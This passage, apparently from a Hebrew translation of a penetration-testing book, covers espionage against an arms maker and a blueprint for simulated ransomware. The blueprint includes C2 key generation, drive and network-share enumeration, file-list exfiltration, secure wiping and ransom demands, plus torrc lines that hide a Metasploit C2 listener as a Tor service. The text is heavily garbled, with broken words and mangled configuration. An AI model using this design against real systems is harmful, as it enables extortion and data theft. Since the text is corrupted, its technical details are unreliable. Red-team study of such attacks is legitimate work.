‫ה חדי שים‪ ,‬הי קרים והאו ל טרה‪-‬מודרניים ביותר )ו ב שנתיים הא חרונות הגיע לידי המורדים‬
‫ה לו בים ע ק ב מ שא ומתן מדיני מוזר מאוד שהוא הר בה מע בר לת חום ש ל ה ספר הזה(‪.‬‬
‫ריגו ל תע שייתי )וגני בה בו טה ש ל רעיונות ע ברו כ חד שנות( זה זמן ר ב‬
‫היה פן ש ל תע שיית הנ ש ק‪ .‬זה בו ל ט במיו חד כא שר מ שווים מער כות נ ש ק ש ל נא ט"ו‪ /‬ברית ור שה מהמ ל חמה‬
‫ה קרה‪ ,‬אך הפי לו סופיה חיה ו קיימת כיום ב ס חר בנ ש ק המ קומי )ראה איור ‪5.2).‬‬
‫איור ‪-AT-4‬ה ‪5.2:‬ה סו ביי טי )מימין( היה עות ק ש ל מער כת ‪MILAN‬הצרפתית‬

‫)מ שמא ל(‪.‬‬
‫מ קור‪ :‬תמונה מור כ בת‪ ,‬ע בודה מ ש לו‬
‫‪...‬העת קה היא ח ל ק מע ס קי הנ ש ק‪ ,‬ואני ב טו ח שתראו את מנגנון ההד ק ב סגנון ‪ P3AT‬בא קד חים ר בים‬
‫א חרים ) שור עו לה בדעת כם(‪ .‬באופן אי שי‪ ,‬לא שמ חתי שרוג'ר טען שי ש לו עיצו ב חד ש לגמרי‪ ,‬כא שר ברור‬
‫שהוא מ בו ס ס ע ל העיצו ב ש לנו‪ .‬ו כ ש שדרוג למנגנון ההד ק שת כננתי מצא את דר כו ‪ -Ruger‬ל לא חר שיצא‬
‫ב‪ ,TA3P-‬זה לא גרם לי להרגי ש טו ביותר‪.‬‬
‫א ב ל זה הע ס ק‪.‬‬
‫‪ -‬מנ כ" ל ‪ Kel-Tec,‬ג'ורג' ק לגרן‪ ,‬ע ל גני בת עין בתע שיית כ לי הנ ש ק‪engineer-answers-your-questions/) .‬‬
‫‪(http://www.thefirearmblog.com/blog/2010/10/12/gun-design-‬‬
‫ר ק בג ל ל שהתרגו ל מ קו ב ל בדרך כ ל ל לא אומר שהוא בדיו ק מ בורך‪ .‬אמנם אין שום ד בר שיצרניםי כו לים לע שות‬
‫כדי לעצור את הת חרות מהנד סה לא חור ש ל המוצרים המוגמרים ש להם‪ ,‬א ב ל זה סי כוי שונה ל ח לו טין מא שר‬
‫לאפ שר להם לצפות במ סמ כי ‪CAD‬או ‪ CNC‬ומפר טים הנד סיים‪ .‬עם הצ לצו ל הזה באוזני‪ ,‬מצאתי את עצמי מת כנן‬
‫תרגי ל דוגמנות ‪ APT‬ע בור א חת מיצרניות הנ ש ק המו בי לות בעו לם ‪ -‬ספ קים ק בועים ל כו חות מזוינים בר ח בי‬
‫העו לם‪ ,‬כו ל ל סניפים ר בים ש ל הצ בא האמרי קאי‪.‬‬
‫באופן לא מפתיע‪ ,‬המ טרות העי קריות ש ל ה בדי קה היו ל ק בוע את ק לות הר כי שה ש ל כ ל ס כמות ותיעוד ה ק שורים‬
‫לת כנון נ ש ק‬
‫ר כי שת כ ל שר טו ט ותיעוד ה ק שור לת כנון וייצור נ ש ק‪ .‬זהי כ לו ל את ק בצי ‪-CAD‬ה שניתן‬

‫לה שתמ ש בהם כדי להניע את מ כונות ‪-CNC‬ה ו כן כ ל מידע שי כו ל להיות שימו שי‬
‫לת חרות כדי ל ק בוע כיצד בעיות הנד סיות מור כ בות מ סוימות נפתרות‪ ,‬כ לומר‪ ,‬ס בי לות‬
‫ל חום ב חומרים מרו כ בים מהדור ה בא‪ .‬זהי כו ל להיות שר טו טים פורמ ליים‪ ,‬תה לי כים‬
‫פנימיים ב שרת ‪SharePoint‬או אינ טראנ ט המ קומי‪ ,‬או אפי לו סתם הערות סתמיות‬
‫המ שותפות בין מהנד סים באמצעות דואר א ל ק טרוני או הודעות מיידיות‪.‬‬
‫דאגה נו ספת הייתה הרגי שות ש ל ה ח ברה להת קפות כופר‪ .‬אמנם כ ל לתי הוראות‬
‫מפור טות כיצד לדמות הד ב קה ש ל תו כנת כופר ב סעיף ה בא ‪ -‬כך ש ט כנו לוגיה כזו‬
‫ע שויה להיות מו בנת טו ביותר ‪-‬העצה ש לי במ קרה ה ספציפי הזה )ו ברו ב המ קרים( היא‬
‫פ שו ט להיות מודע ל ס כנות ש ל תו כנות כופר ל קיים תו כנית ה בראה לפני מע שה‪.‬‬
‫‪ )OSINT‬בינת קוד פתו ח(‬

‫לעו לם אין לז לז ל ב ח שי בותה ש ל ‪)OSINT‬או מודיעין קוד פתו ח( ‪ -‬מדהים כמה מידע‬
‫שימו שי ל ש ח קן חיצוני ניתן להפי ק מהאינ טרנ ט‪ ,‬חו ברות‪ ,‬ראיונות ומאתר האינ טרנ ט‬
‫ש ל ה ח ברה עצמה‪ .‬ש קו ל מה או לי תרצה לדעת להי כנ ס לתרגי ל דוגמנות כזה‪.‬‬
‫היעד הו לך להיות שימו ש ב כמה ט כנו לוגיות ותו כנה מאוד ספציפיים; לדעת בדיו ק‬
‫מהי ק טין את זמן ההת ק שרות ה כו ל ל ו ב כךי ק טין את אפ שרויות הגי לוי והגד לת‬
‫ה סי כויים למ שימה מוצ ל חת‪ .‬ה ש טן נמצא בפר טים‪ ,‬א ב ל הפר טים בדרך כ ל ל‬
‫נמצאים שם לעיני כ ל‪.‬‬
‫מ סירת מ טען ח ל ק ‪V:‬הדמיית א‬

‫מת קפת כופר‬
‫תו כנת כופר היא כיום מ כת האינ טרנ ט וזו בעיה ש כנראה ר ק ת חמיר‪ .‬בהת ח ש ב ב כך‬
‫שר ק כי שורי ת כנות ב סי סיים נדר שים ל ביצוע מת קפה כזו ) כמו גם הזמינות הר ח בה‬
‫ש ל ספריות קריפ טו ש ל צד ש לי שי(‪ ,‬זה למע שה מפתיע ש סוג זה ש ל תו כנות זדוניות‬
‫אי חר כ ל כך להופיע ו להת בגר‪ .‬כעת‪ ,‬זה כמע ט ב לתי נמנע שהארגון ש לךייפגע ב ש ל ב‬
‫מ סוים‪.‬‬
‫מהי תו כנת כופר?‬

‫תו כנת כופר היא תו כנה ש בפרי סה למאר ח שנפגע‪ ,‬מצפינה ק בצים )או במ קרים‬
‫מ סוימים את כ ל ש ט ח הא ח סון המ קומי( ודור שת ת ש לום ע בור ש חזור נתונים בצורה‬
‫ש ל סי סמה או מפת ח פענו ח‪ ,‬בהתאם לאופי התו כנה הזדונית‪ .‬בדרך כ ל ל תו כנות כופר‬
‫מוע ברות באמצעות ער כות ניצו ל המ כוונות לפגיעויות בתו כנות בצד ה ל קו ח‪ ,‬כא שר‬
‫‪Adobe Flash‬היא היעד הפופו לרי ביותר ב ש ל הפרי סה ה כמע ט אוני בר ס לית ש לה‬
‫וההי ס טוריה הנוראה ש ל פגמי א ב ט חה‪ .‬ת ש לום נדר ש כמע ט תמיד באמצעות בי ט קוין‪,‬‬
‫מ ט בע קריפ טו אנונימי למ חצה שנוצר ע לידי ‪ "Satoshi Nakamoto",‬שהוא ה שם‬
‫ה בדוי ש ל צדדים לאידועים בזמן כתי בת שורות א לה )י ש הר בה אנ שים ש טענו לזהות‬
‫את זה ועוד הר בה שע שו זאת‪ .‬מזוהה באופן שגוי כ כזה(‪.‬‬
‫תו כנת כופר היא בעיה הו ל כת וגו ברת‪ .‬זה כ סף ק ל לפ שע מאורגן שמעוניין ל כוון לפירות‬
‫ת לויים נמוך ותמידי ש אנ שים שמו כנים ל ש לם‪ .‬ח ל ק מ ק בוצות או מ ח ברי תו כנות ה כופר‬
‫י ק ב לו ת ש לום דרך ‪PayPal‬אך נו טים לדרו שיותר כ סף‪ ,‬כ כ ל הנראה כדי לפצות ע ל‬
‫הצעדים הנו ספים שי ש לנ קו ט כדי לא ב ט ח את זהותם ש ל הגנ בים‪.‬‬
‫לעו לם א ל ת ש לם את ה כופר‪ .‬כ ל סנ ט שאתה מ ש לם ל ס ח טנים מממן ת קריות‬

‫כא לה בעתיד ונ כנ ס היי שר ל כי ס ש ל ההמון‪ .‬בצע גי בוייםיומיים ש ל הנתונים ש לך‬
‫בא ח סון נפרד‪ .‬גם אם אתה מ ש לם ‪ ,‬אין לך ערו בה ל ק ב ל את הנתונים ש לך ב חזרה‪.‬‬
‫זה לא מ שנה אם ה כופר הוא ‪$100‬או ‪ $1,000,000 -‬כ ל הצ ל חה עודיותר מ חז קת‬
‫את התו קף‪ .‬א ל ת ש לם‪.‬‬
‫למה לדמות מת קפת כופר?‬

‫המ טרה ה סופית ש ל בדי קות חדירה היא להמ חי ש איום‪ ,‬סי כון ופגיעות‪ .‬הדגמת זאת‬
‫בי ח ס למ שתמ ש ה קצה דור שת לעתים קרו בות ה ק שר ותו כנת כופר היא דוגמה ר בת‬
‫עוצמה‪ .‬מ שתמ ש שמתעמת עם חו סר האונים הנו בע מהיותו קור בן למת קפה כזו לעו לם‬
‫לא צריך לומר לו שו ב מדוע הא ב ט חה ח שו בה‪ ,‬וגם לא לצורך העניין‪-CISO ,‬ה לא רוצה‬
‫לה ס ביר למנ כ" ל שאם הוא רוצה את ה‪ PI-‬הי קר ש לו ב חזרה ‪ ,‬הם צרי כים ל ש לם מי ליון‬
‫דו לר למאפיה הרו סית‪.‬‬
‫ב לי לרצות להזיז את הנ קודה ה ביתה‪ ,‬הימים ש בהם ע ס קים היו צרי כים לדאוג לג בי שום‬
‫ד בר מעצ בןיותר מ בני נוער מ שועממים ומתגי אינ טרנ ט ח לפו מזמן‪.‬י ש אנ שים רעים‬
‫מאוד ב חוץ ואתה צריך לדעת מו ל מה אתה מתמודד‪.‬‬
‫דגם ל סימו לציית כופר‬

‫ע ל מנת לדמות מת קפת כופר‪,‬י ש צורך במידה מ סוימת ליצור תו כנות כופר ‪-‬אתה‬
‫לא תרצה ב כ ל זאת לה שתמ ש ב קוד העוין ש ל מי שהו א חר‪ .‬בעת פיתו ח מ סגרת‬
‫מציאותית‪ ,‬ש קו ל את הפונ קציונ ליות ה באה כמינימום‪:‬‬
‫הצפנה א סימ טרית ב ל בד‪.‬י ש לה שתמ ש במפת חות נפרדים להצפנה ו לפענו ח‪.‬‬
‫יצירת מפת ח מר חו ק‪ .‬ברגע הפרי סה‪ ,‬סו כן ‪C2‬צריך ל ש לו ח ב ק שה ל שרת ‪C2‬‬

‫ב ב ק שה ליצור זוג מפת חות פר טי וצי בורי‪ .‬לא חר מ כן מורידים את המפת ח הצי בורי‬
‫ל סו כן לצורך תה ליך ההצפנה‪ ,‬מה שמ ב טי ח ש למער כת שנפרצה לעו לם לא תהיה‬
‫גי שה למפת ח הפר טי ) שמנגד מ שמ ש לפענו ח(‪ .‬צמד המפת חותית קיים ב שרת‬
‫ב ספרייה מ ש לו באופן שניתןיהיה ל ק שר אותו למער כת היעד בעתיד‪ .‬דוגמה א חת‬
‫היאיצירת ‪ Hash SHA‬ש ל המפת ח הצי בורי ו שימו ש בזה כ שם ה ספרייה‪.‬‬
‫ניתן להגדרה כדי למ קד ל ק בוצות ק בצים ספציפיות ) כ לומר‪ ,‬מ סמ כי ‪Word,‬גי ליונות‬
‫א ל ק טרוניים ש ל ‪ Excel‬ו כן ה לאה( ו כן ל ק בוע אם ר ק ק בצים מ קומיים מות קפים או‬
‫אםי ש ל כ לו ל גם שיתופי ר שת‪.‬‬
‫מ חי קה מאו ב ט חת‪ .‬לא חר שה קו בץ מוצפן‪,‬י ש למ חו ק את המ קור בצורה כזו ש לא‬

‫ניתן ל ש חזר אותו‪ .‬גי בו ב וה ח לפת ה קו בץ היא דוגמה א חת לאופן ש בו ניתן לה שיג‬
‫זאת‪.‬‬
‫הודע למ טרה ע ל ההת קפה המוצ ל חת ו ספ ק אמצעי ל ש חזר את‬
‫ק בצים‪ ,‬כ לומר‪,‬יצירת ‪ hash SHA‬ש ל המפת ח הצי בורי במער כת שנפרצה ומ ספ קת‬
‫מ חרוזת זו כא סמ כתא בעת ב ק שת ת ש לום‪ .‬דרך או טומ טית ל ש חזר ק בצים עם‬
‫המפת ח לא חר ת ש לום ה כופר צרי כה להיות מו בנית ב סו כן ‪C2.‬‬
‫הי כו לת לייצא את ה שמות ש ל כ ל ה ק בצים המוצפנים ב חזרה ל שרת ‪ C2‬למ קרה‬

‫שי ש מ שהו מעניין שניתן להו סיף ל"ר שימת קניות"‪ ,‬כ לומר לגנו ב‪.‬‬
‫קריפ טוגרפיה א‪ -‬סימ טרית זו אינה מ סה ע ל ט כנו לוגיה קריפ טוגרפית ‪-‬זה מע בר לת חום‬
‫ש ל ע בודה זו‪ .‬עם זאת‪,‬י ש צורך לה בין כמה ע קרונות גם אם אתה לא מעוניין או מ כיר‬
‫מה קורה מת חת למ כ סה המנוע‪ .‬זה בה ח ל ט לא ה כר חי להיות מ סוג ל ליי שם צפנים או‬
‫פרו טו קו לים קריפ טוגרפיים מאפ ס‪ ,‬ש כן ל כ ל שפת ת כנות גדו להיהיו ספריות קריפ טו‬
‫שמתאימות למ טרות ש לנו‪ .‬אם אתה מ חפ ש מ בוא טו ב ל קריפ טוגרפיה‪ ,‬אני מציע מהדורת‬
‫יום ה שנה ה‪ 02-‬ש ל ‪ Applied Cryptography‬מאת ברו ס שנייר ‪(Wiley, 2015).‬‬
‫במי לים פ שו טות‪ ,‬קריפ טוגרפיה א סימ טרית )או קריפ טוגרפיה ש ל מפת ח צי בורי(‬
‫מ שתמ שת ב שני מפת חות שונים ‪-‬א חד להצפנה וא חד לפענו ח‪ .‬מ ב חינה מתמ טית‪,‬‬
‫מפת חות א לה ק שורים‪ ,‬אך לא ניתן לגזור א חד מה שני‪ .‬היתרון ש ל גי שה זו במ שימות‬
‫א ב ט חהיומיומיות הוא שניתן ל שתף מפת ח צי בורי עם אנ שי ק שר )או עם כ ל האינ טרנ ט(‪,‬‬
‫מה שמאפ שר להצפין תו כן‪ ,‬א שר בתורוי כו ל לג שת ר ק ל כ ל מי שי ש לו גי שה לפר טי ש לך‪.‬‬
‫מפת ח ) שצריך להיות ר ק אתה(‪ .‬זה אידיא לי ע בוריי שומים כגון דואר א ל ק טרוני‪ .‬זאת‬
‫בה שוואה להצפנה סימ טרית )או הצפנת מפת ח פר טי(‪ ,‬כא שר אותו מפת ח מ שמ ש‬
‫להצפנה ו לפענו ח‪ .‬זה לא מתאים להת קפת תו כנת כופר‪ ,‬מ כיוון ש לפ חות ס ביר שניתן‬
‫יהיה ל ש חזר את המפת ח ע לידי תרגי ל פורנזי מו כ שר‪ .‬זה לא ס ביר למ טרות המפור טות‬
‫כאן א ב לי ש ל חפ ש ש למות ב כ ל ד בר‪.‬‬
‫מנ קודת המ ב ט ש ל תו כנת כופר‪ ,‬קריפ טו א‪ -‬סימ טרי שימו שי כי זה אומר שניתן לנעו ל‬
‫ק בצים‪ ,‬ו בתמורה ל כופר‪ ,‬מ סופ ק מ שהו מו ח שי כדי ל ש חזר אותם ‪ -‬מ שהו שאין סי כוי‬
‫שה קור בןיו כ ל לר כו ש א חרת ‪ -‬וזה הפר טי מַ פְ ֵת ַח‪.‬‬
‫ב שפת הת כנות ‪C,‬י ש לך גי שה ל ספריית ‪libgcrypt ,‬המוצגת ב ט ב לה ‪5.1,‬המ כי לה את‬

‫כ ל מה שאתה צריך כדי ליי שם מת קפת כופר‪RSA .‬או ‪DSA‬הן ח בי לות הצופן הצי בוריות‬
‫המומ לצות‪.‬‬
:‫הפונ קציות ה באות הן בע לות עניין ספציפי‬
.‫ מ כי לה את כ ל פונ קציות ההצפנה שאי פעם תזד ק ק להן‬libgcrypt ‫ ספריית‬5.1: ‫ט ב לה‬
‫ּ ְפ רִימִי טִי בִי‬ ‫א לגוריתמים אויי שום‬

‫א ֹו‬
‫מ בצע‬
‫צפנים סימ טריים‬ ,(‫ סי ביות‬IDEA, 3DES, CAST5, Blowfish, AES (128, 192, 256
[5] : RC4, DES, Serpent (128, 192, 256 ,(‫ סי ביות‬Twofish (128, 256
SEED, ,(‫ סי ביות‬Ron's Cipher 2 RC2 (40, 128 ,(‫ סי ביות‬ARCfour
Salsa20, Salsa20/12, ChaCha20, ,(‫( סי ביות‬128, 192, 256 ‫קמ ליה‬
GOST 28147-89
[6] :‫מצ בי צופן‬ ECB, CFB, CBC, OFB, CTR, AES-Wrap (RFC 3394), CCM,
GCM, Stream, OCB
‫א לגוריתמים ש ל‬ RSA, DSA, ElGamal, ECDSA, EdDSA
[8] ‫מפת ח צי בורי‬
[7] :
[9] : ‫א לגוריתמים ש ל‬ RIPEMD-160 TIGER/192, TIGER1, TIGER2, Whirlpool, CRC-24

hash SHA3-224, SHA3-256, SHA3-384, SHA3-512, SHAKE128, SHAKE256,
‫) כמו‬MD2, MD4, MD5, SHA-1, SHA-224, SHA-256, SHA-384, SHA-512,
R 34.11-94, GOST R 34.11-2012 (256, 512 ‫) כמו‬2440), CRC-32 CFR-‫ב‬
(‫ ב סי ביות‬-ISO 3309, RFC 1510), GOST
‫קודי אימות ש ל‬ HMAC, CMAC, GMAC, Poly1305

‫הודעות‬
[10]
[11] ‫( פונ קציות גזירת מפת ח‬MACs):
,(‫מ לו ח‬+‫ אי טרציה‬,‫ מ לו ח‬,‫ פ שו ט‬4880: CFR-‫) כמו ב‬S2K
PBKDF2, SCRYPT
ECC Brainpool / RFC 5639 (P256r1, P384r1, P512r1), :‫( ע קומות א ליפ טיות‬KDFs):
R (34) 2001, 34.10-2012) ‫ ברנ ש טיין‬NIST (P-256, P-384, P-521), SECG (secp256k1),
(Curve25519), GOST-
.‫הצפן נתונים באמצעות מפת ח צי בורי‬gcry_pk_encrypt—

.‫ פענו ח נתונים באמצעות מפת ח פר טי‬gcry_pk_decrypt -
‫—‪gcry_pk_genkey‬צור זוג מפת חות צי בורי‪/‬פר טי חד ש‪.‬‬
‫יצירת מפת ח מר חו ק‬
‫י ש ליצור את צמד המפת חות ב שרת כדי לה ב טי ח שה ל קו ח לעו לם לאיראה את המפת ח‬
‫הפר טי עד ש שו לם ה כופר‪ .‬כמהיי שומי כופר מייצרים את צמד המפת חות ב ל קו ח ואז‬
‫שו ל חים את המפת ח הפר טי ל שרת‪.‬‬
‫ה ס כנה ב כך כפו לה‪ :‬שגיאה המוע ברת ל שרת ע לו לה למנוע את מ סירת המפת ח הפר טי‪,‬‬
‫ו להפוך את ה ק בצים ל ב לתי ניתנים ל ש חזור ל ח לו טין‪ .‬אם המפת ח הפר טי נוצר ע ל‬
‫ה ל קו ח‪ ,‬תמיד קיימת ס כנה שהואי כו ל להיות בר ה ש חזור ע לידי ה קור בן‪ .‬ברור שאף‬
‫א חד מהתר חי שים ה ל לו אינו מועי ל‪.‬‬
‫מי קוד ק בצים‬

‫ניתן למ קד ל כ ל סוגי ה ק בצים באמצעות מ סמ כי ‪ Microsoft Office‬ו ק בצי מ סד נתונים‪.‬‬
‫ניתן למ קד כ ל ד בר שע שוי לה כי ל מידעי קר‪ ,‬כו ל ל ק בצי נתוני מ ש ח קים וארנ קי בי ט קוין‪.‬‬
‫‪ -Windows,‬ב כונני די ס קים מופנים באמצעות אות ) כו ל ל שיתופי ר שת(‪ ,‬כך שה ש ל ב‬
‫הרא שון צריך להיות למנות את כ ל ה כוננים ו ל סרו ק אותם לאיתור ק בצים מ סוג קו בץ‬
‫היעד‪ .‬לא חר שתה ליך זה ה סתיים‪,‬י ש לייצא מניפ ס ט ש לם ב חזרה ל שרת ‪ )C2‬כיוון‬
‫שיית כנו מ סמ כים מעניינים שאו לי כדאי ל שמור(‪ .‬ב ש ל ב זה )ור ק ב ש ל ב זה(י ש להת חי ל‬
‫בהצפנת ה קו בץ‪ .‬כ כ ל ש כ ל קו בץ מוצפן‪,‬י ש להו סיף את שמו לר שימה איפ שהו במאר ח‬
‫) כ לומר‪c:\ransom\files.txt) ,‬וי ש לה שמיד את ה קו בץ המ קורי באמצעות קרצוף‬
‫קריפ טוגרפי‪.‬י ש לדרו ס את ה קו בץ ע לידי נתונים גי בו ב א קראי לפני שהואיימ ח ק‪.‬י ש‬
‫למ קם את ה קו בץ המוצפן באותה ספרייה כמו עמיתו ב ט ק ס ט רגי ל )ראה איור ‪5.3).‬‬
‫איור ‪5.3:‬זרימת תה ליך ההצפנה‪.‬‬
‫מ ב ק ש את ה כופר‬
‫לא חר ה ש למת ההת קפה‪ ,‬המפת ח הצי בורי עו בר גי בו ב תוך שימו ש באותו תה ליך ש בו‬
‫הוא נוצר ב שרת ‪C2.‬המ טרה הי חידה ש ל זה היא ליצור מזההיי חודי ק טן שה קור בנות‬
‫י כו לים לה שתמ ש בו בעת הודעה ע ל כך ש שי למו את ה כופר ו לאפ שר למ בצע למצוא‬
‫את המפת ח הפר טי המתאים‪ .‬ניתן להד בי ק את ‪-hash‬ההזה בדף אינ טרנ ט ו למ סור‬
‫את המפת ח הפר טי באופן או טומ טי‪.‬י ש ליידע את ה קור בנות גם לג בי התו כן ש ל‬
‫‪ c:\ransom\files.txt‬כדי שיהיה ברור ל ח לו טין מה עומד ע ל כף המאזניים‪ .‬ראה איור‬
‫‪5.4.‬‬
‫איור ‪5.4:‬זרימת תה ליך פענו ח‪.‬‬
‫שמירה ע ל ‪ C2‬כדאי לציין שגם אם ת ש למו כופר‪ ,‬זה לא אומר שזו תהיה הפעם‬
‫הא חרונה שת שמעו מהתו קף‪ .‬במ קרה זה‪ ,‬ת שתית ה ש לי טה וה ב קרה עדיין קיימת‬
‫ותי קים ש ל ה קור בן עדיין נגי שים‪.‬‬
‫הת קפת תו כנת כופרי כו לה להיות ר ק מר כי ב א חד בתר חי ש ‪ APT‬גדו ליותר‪ .‬כפי שראית‬
‫בפר ק ה קודם‪ ,‬ברגע ש ח ל קים גדו לים ש ל הר שת או הת חום נגי שים לתו קף‪ ,‬גני בת נתונים‬
‫ב קנה מידה גדו לי כו לה להפוך ב ק לות לפעו לת כופר ב קנה מידה גדו ל‪ .‬למר בה הצער‪,‬‬
‫היעד הפופו לרי ביותר להת קפות כא לה כרגע הם בתי חו לים מ כיוון שהם ת חת ה ל חץ‬
‫הג בוה ביותר ל ש לם‪ .‬אין להם זמן לע סו ק בפעו לות מ שפ טיות ארו כות טוו ח או בתרגי לי‬
‫ש חזור נתוניםי קרים כא שר ה ק בצים שהם אי בדו גי שה א ליהם חיוניים למתן שירותי‬
‫בריאות‪.‬‬
‫מ ח ש בות א חרונות‬
‫האם אי פעם באמת כדאי ל בצע תרגי ל כזה? לא‪ .‬אתה בה ח ל טי כו ל לע שותיותר נז ק‬
‫מתוע לת אם אתה עו שה זאת ב חו סר מע ש ) שאני לא לו ק ח א חריות ע ליו(; עם זאת‪,‬‬
‫אין ספ ק בא שר ליעי לותו‪ .‬אם אתה ‪ CISO‬שעורך בדי קות חדירה כמנוף כדי ל ק ב ל‬
‫ת קצי ב גדו ליותר לא ב ט חה‪ ,‬זה ע שוי להיות מ שהו ש כדאי ל ש קו ל ) בצורה מאוד‬
‫מ בו קרת(‪.‬‬
‫פי קוד ו ב קרה ח ל ק ‪V:‬יצירת סמוי‬

‫פתרון ‪C2‬‬
‫הה כר ח לת ק שר דרך האינ טרנ ט הוא ה חו ליה ה ח ל שה ב כ ל ת שתית ש לי טה ו ב קרה‪ .‬גם‬

‫אם ה‪ 2C-‬מופץ ע ל פני מ ספר שרתים‪,‬י שנה ה ש בריריות המו בנית הנו בעת מהצורך‬
‫לד בר עם כתו בות ‪ IP‬שע לו לות להי ח סם בנת ב ג בו ל אם צוות הר שת מ ח שי ב את‬
‫התע בורה כ ח שודה או אם שרתי ‪ C2‬מתוו ספים למאגרי מידע ע ל איומים‪ .‬כגון‬
‫‪ Open Threat Exchange,‬שי כו ל לעד כן או טומ טית מ כ שירי א ב ט חה עם כתו בות ש ל‬
‫"ידוע‪-‬רע"‪ .‬בעיה נו ספת היא ש ברגע ש שרת ‪C2‬זוהה‪ ,‬הוא נמצא ב סי כון ש ל בי טו ל פיזי‬
‫ותפ ס ע לידי ר שויות ה חו ק‪ .‬למר בה המז ל‪,‬י ש פתרון ל שתי ה בעיות ה ל לו‪.‬‬
‫הי כרות עם נת ב ה בצ ל אם אתה קורא את זה‪ ,‬ס ביר להני ח שנת ק לת בנת ב ה בצ ל )‪(Tor‬‬
‫בצורה כזו או א חרת או לפ חותי ש לך מו שג מה זה‪ .‬ל סי כום‪ Tor ,‬מ שמ ש בעי קר‬
‫לאנונימיזציה ש ל התנהגות מ שתמ ש באינ טרנ ט ‪-‬תע בורת אינ טרנ ט ) לדוגמה( מנות בת‬
‫דרך מ ספר ש כ בות ש ל נת בים )ו ל כן ה בצ ל( לפני שהיא מנות בת חזרה לאינ טרנ ט הצי בורי‬
‫דרך צומתיציאה‪ .‬כ ל ש כ בהי כו לה לראות ר ק את ה חי בורים ש לה במע לה הזרם והמורד‬
‫הזרם ב כ ל הפע לה והתנועה מוצפנת‪ .‬זה למע שה הופך את מ שתמ ש האינ טרנ ט‬
‫לאנונימי‪.‬‬
‫עם זאת‪,‬י ש בעיות בגי שה זו‪ .‬אם תו קפים שו ל טים בצומת היציאה‪ ,‬הםי כו לים לראות‬
‫את התנועה עו ברת ליעד ה סופי ש לה‪.‬י שנן גם הת קפות מתאם שניתן ל בצע ע לידי‬
‫ש ח קנים גדו לים ) כגון ‪-NSA,‬הה שו ל ט בצמתייציאה ר בים(‪ ,‬המאפ שרות לזהות את‬
‫המ שתמ ש ע לידי הצ ל בת מנות הנ כנ סות ויוצאות מר שת ‪ )Tor‬לפ חות בתיאוריה(‪ .‬עם‬
‫זאת‪ Tor ,‬מאפ שרת לנו גם ל ספ ק שירותים בתוך הר שת ה"אפ לה" עצמה ‪-‬זהיוצר‬
‫למע שה ) לדוגמה( שרת אינ טרנ ט אנונימי ל ח לו טין שניתן לצפות בו ר ק באמצעות ‪Tor‬‬
‫ומ שתמ ש במער כת כתו בות מ בוזרת מ ש לו‪ .‬זה אידיא לי לצר כים ש לנו‪ .‬ניתן ל ספ ק שרת‬
‫‪ C2‬כצומת בתוך ר שת ‪ Tor‬והמאר ח שנפרץית ח בר ל‪ roT-‬כ שהוא נ כנ ס לאינ טרנ ט‪,‬‬
‫עו קף ל ח לו טין את א ב ט חת הר שת המ קומית ו שאר הגי שה התפעו לית‪ ,‬גם אם מזוהים‬
‫מאר חים שנפגעו‪.‬‬
‫הערה‬
‫זהו אך ור ק מדריך מע שי‪ .‬אני לא מת כוון לדון ע ל היתרונות וה ח סרונות ש ל‬

‫ט כנו לוגיית ‪ )Tor‬למרות שזה די מרת ק(‪ .‬אתהי כו ל למצוא מידע ר ב באתר‬
‫)‪ Tor (http://www.torproject.org‬והפורומים ה ק שורים א ליו אם אתה מעוניין‬
‫ל למוד עוד ע ל הפרוי ק ט‪.‬‬
‫הד בר הרא שון שצריך לע שות הוא להוריד את תו כנת — ‪Tor‬היא זמינה ע בור מגוון ר ח ב‬
‫ש ל פ ל טפורמות‪ .‬מדריך זה מ שתמ ש בגר סת לינו ק ס ע בור ‪ C2‬ו בגר סת ‪ Windows‬ע בור‬
‫סו כן ‪C2,‬אך הוראות א לו הן כמע ט זהות ל לא ק שר למער כת ההפע לה‪ .‬הדרך ה ק לה‬
‫ביותר להמ שיך היא להוריד את ח בי לות הדפדפן ‪Tor,‬המ שמ שות לג לי שה אנונימית‬
‫באינ טרנ ט‪ .‬זה כמו בן לא מה שאנ חנו רוצים לע שות‪ ,‬א ב ל ה ח בי לה המ לאה מ כי לה את‬
‫הר כי בים ה בודדים שאנ חנו צרי כים‪ ,‬אותם ניתן ל ש לוף ו ל בנות בת שתית ‪ C2‬ש לנו‪ .‬הגדרה‬
‫זו מני חה את ה קיום ש ל שרת ‪C2‬המוגדר פ חות אויותר בהתאם ל קווים שתוארו בפר קים‬
‫ה קודמים‪ .‬זה ה כר חי ש כ ל ה שירותים‪ ,‬בין אם הם ‪ SSH,‬שרת אינ טרנ ט או מאזין‬
‫‪Metasploit,‬יהיו ח שופים ר ק ב כתו בת המאר ח המ קומי‪ .‬ה סי בה ל כך היא ש כאן נ קודת‬
‫ה קצה ש ל מנהרת ‪Tor‬תצפה להן להיות וגם מ ב טי חה ש לא ניתןיהיה למנות שום ד בר‬
‫לג בי ה‪ 2C-‬מהאינ טרנ ט‪ ,‬כמו למ ש ל ע לידי מנועי חיפו ש‪.‬‬
‫קו בץ ‪Torrc‬‬
‫‪ Tor‬מא ח סן את התצורה ש לו ב קו בץ שנ קרא ‪ torrc.‬מי קומו ש ל קו בץ זה ת לוי במער כת‬

‫ההפע לה‪ -Windows, .‬בהוא נמצא ב ספריית ההת קנה; ב לינו ק ס ניתן למצוא אותו ב‬
‫;‪ -˜/.tor‬ו ב‪OS X, caM-‬הוא נמצא ב ספריית היי שומים ת חת ח בי לת הדפדפן ‪Tor.‬יהיה‬
‫ע ליך ל בצע ‪ sudo‬ו ל שנות אותו מ שורת הפ קודה‪ .‬ל לא ק שר למער כת ההפע לה‪ ,‬קו בץ‬
‫‪torrc‬זהה‪ .‬ע ל מנת ליצור שירות נ סתר‪ ,‬ע ליך לצרף את ה שורות ה באות ל קו בץ‪:‬‬
‫‪#‬הגדר ספריית שירות מו סתר ‪# C2 Metasploit listener HiddenServicePort 1278.00.0.8‬‬

‫‪443 127.0.0.1:4433 # C2 SSH Port HiddenServicePort 7022 127.0.0.1:7022‬‬
‫‪HiddenServiceeDir homewil/tor_hidden # C2 Web Port HiddenServicePort‬‬
‫זה הופך אתיציאות ‪ TCP 443, 7022‬ו‪ 0808-‬לזמינות במאר ח ‪ Tor,‬בהנ חה ש‪2C-‬‬
‫ש לנו מ שתמ ש ביציאות א לו‪ .‬שנה אותם למה שאתה צריך שהםיהיו‪ .‬ספריית ה שירות‬
‫הנ סתרת היא פ שו ט המ קום ש בויי שמרו מפת חות ה שרת ש לנו וצרי כה להיות מ חוץ‬
‫ל ספריית ה שור ש ש ל שרת האינ טרנ ט‪ .‬הערה‬
